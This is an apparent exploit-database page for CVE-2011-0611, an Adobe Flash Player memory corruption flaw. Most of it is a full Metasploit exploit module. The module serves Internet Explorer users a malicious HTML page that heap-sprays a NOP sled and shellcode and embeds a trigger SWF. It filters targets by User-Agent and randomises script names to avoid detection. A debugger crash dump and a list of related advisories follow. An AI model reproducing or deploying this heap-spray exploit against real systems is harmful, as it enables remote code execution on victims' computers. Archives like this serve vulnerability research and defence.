Lucene search
RootSSV:20497HistoryApr 24, 2011 - 12:00 a.m.
Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
2011-04-2400:00:00
Root
www.seebug.org
23
0.97 High
EPSS
Percentile
99.7%
No description provided by source.
##
# $Id: adobe_flashplayer_flash10o.rb 12330 2011-04-16 02:09:33Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
'Description' => %q{
This module exploits a vulnerability in Adobe Flash Player that was discovered, and
has been exploited actively in the wild. By embedding a specially crafted .swf file,
Adobe Flash crashes due to an invalid use of an object type, which allows attackers to
overwrite a pointer in memory, and results arbitrary code execution.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 12330 $",
'Author' =>
[
'sinn3r',
],
'References' =>
[
[ 'CVE', '2011-0611' ],
[ 'OSVDB', '71686' ],
[ 'BID', '47314' ],
[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],
[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],
[ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],
[ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],
[ 'URL', 'http://secunia.com/blog/210' ],
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets' =>
[
[ 'IE 6/7 on Windows XP SP3 and Windows Vista', {} ],
],
'Privileged' => false,
'DisclosureDate' => "Apr 11 2011",
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
if agent !~ /MSIE \d\.\d/ and agent !~ /NT \d\.\d/
send_not_found(cli)
return
end
if request.uri =~ /\.swf/
print_status("Sending trigger SWF...")
send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )
return
end
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
nopsled = Rex::Text.to_unescape( [0x0c0c0c0c].pack('V') * 8 , Rex::Arch.endian(target.arch))
swf_name = rand_text_alpha(rand(3))
js_func_name = rand_text_alpha(rand(6) +3)
js_var_blocks_name = rand_text_alpha(rand(6) + 3)
js_var_shell_name = rand_text_alpha(rand(6) + 3)
js_var_nopsled_name = rand_text_alpha(rand(6) + 3)
js_var_index_name = rand_text_alpha(rand(6) + 3)
js_var_padding_offset = rand_text_alpha(rand(6) + 3)
trigger_file_name = "#{get_resource}/#{swf_name}.swf"
html = <<-EOS
<html>
<head>
<script>
function #{js_func_name}() {
var #{js_var_blocks_name} = new Array();
var #{js_var_shell_name} = unescape("#{shellcode}");
var #{js_var_nopsled_name} = unescape("#{nopsled}");
var #{js_var_padding_offset} = #{js_var_shell_name}.length;
while (#{js_var_nopsled_name}.length < 0x10101) { #{js_var_nopsled_name} += unescape("#{nopsled}") };
#{js_var_nopsled_name} = #{js_var_nopsled_name}.substring(#{js_var_padding_offset}, #{js_var_nopsled_name}.length);
#{js_var_blocks_name}[0] = #{js_var_nopsled_name} + #{js_var_shell_name};
for (#{js_var_index_name}=1; #{js_var_index_name} < 0x802; #{js_var_index_name}++) {
#{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_blocks_name}[0].substring(0, #{js_var_blocks_name}[0].length);
}
}
#{js_func_name}();
</script>
</head>
<body>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="#{trigger_file_name}" />
<embed src="#{trigger_file_name}" quality="high" type="application/x-shockwave-flash"
pluginspage="http://www.macromedia.com/go/getflashplayer">
</embed>
</body>
</html>
EOS
html = html.gsub(/^\t\t/, "")
print_status("Sending malicious HTML to #{cli.peerhost}:#{cli.peerport}")
send_response(cli, html, {'Content-Type' => "text/html"} )
end
def exploit
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2011-0611.swf")
f = File.open(path, "rb")
@trigger = f.read(f.stat.size)
f.close
super
end
end
=begin
0:000> r
eax=11111110 ebx=00000000 ecx=01d650b0 edx=00000007 esi=0013c2f0 edi=01d650b0
eip=100d01f6 esp=0013c12c ebp=0013c230 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
Flash10o+0xd01f6:
100d01f6 ff5008 call dword ptr [eax+8] ds:0023:11111118=????????
0:000> dd ecx
01d650b0 11111110 00000000 00000000 00000000
01d650c0 00000000 00000000 00000000 00000000
01d650d0 00000000 00000000 00000000 00000000
01d650e0 00000000 00000000 00000000 00000000
01d650f0 00000000 00000000 00000000 00000000
01d65100 00000000 00000000 00000000 00000000
01d65110 00000000 00000000 00000000 00000000
01d65120 00000000 00000000 00000000 00000000
=end
Related
redhat
redhat
(RHSA-2011:0451) Critical: flash-plugin security update
2011-04-18 00:00:00
openvas
openvas
SUSE: Security Advisory for flash-player (SUSE-SA:2011:018)
2011-04-22 00:00:00
Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)
2011-04-22 00:00:00
FreeBSD Ports: linux-flashplugin
2011-05-12 00:00:00
cert
cert
Adobe Flash Player contains unspecified code execution vulnerability
2011-04-12 00:00:00
threatpost
threatpost
Analysis of the New Adobe Flash Attacks
2011-04-13 16:13:42
Adobe Flash Bug Being Used in Attacks Via Word Documents
2011-04-12 11:51:03
Adobe Releases Patch for Flash Zero Day Hole in Reader, Acrobat
2011-04-21 20:11:41
attackerkb
attackerkb
CVE-2011-0611
2011-04-13 00:00:00
prion
prion
Type confusion
2011-04-13 14:55:00
cve
cve
CVE-2011-0611
2011-04-13 14:55:00
nessus
nessus
seebug
seebug
Adobe Flash Player 'SWF'ζδ»ΆθΏη¨ε
εη ΄εζΌζ΄
2011-04-13 00:00:00
Adobe Reader X Atom Type Confusion Vulnerability Exploit
2014-07-01 00:00:00
metasploit
metasploit
Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
2011-04-16 02:09:33
saint
saint
Adobe Flash Player callMethod Bytecode Memory Corruption
2011-04-21 00:00:00
Adobe Flash Player callMethod Bytecode Memory Corruption
2011-04-21 00:00:00
Adobe Flash Player callMethod Bytecode Memory Corruption
2011-04-21 00:00:00
suse
suse
remote code execution in flash-player
2011-04-18 16:33:38
cisa_kev
cisa_kev
Adobe Flash Player Remote Code Execution Vulnerability
2022-03-03 00:00:00
thn
thn
Emergency Adobe Flash Player patch coming today !
2011-04-16 07:59:00
freebsd
freebsd
linux-flashplugin -- remote code execution vulnerability
2011-01-20 00:00:00
checkpoint_advisories
checkpoint_advisories
exploitpack
exploitpack
Adobe Reader X 10.0.0 10.0.1 - Atom Type Confusion
2011-07-03 00:00:00
ubuntucve
ubuntucve
CVE-2011-0611
2011-04-13 00:00:00
packetstorm
packetstorm
Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
2011-04-17 00:00:00
exploitdb
exploitdb
Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion
2011-07-03 00:00:00
Adobe Flash Player 10.2.153.1 - SWF Memory Corruption (Metasploit)
2011-04-16 00:00:00
securelist
securelist
myhack58
myhack58
gentoo
gentoo
Adobe Flash Player: Multiple vulnerabilities
2011-10-13 00:00:00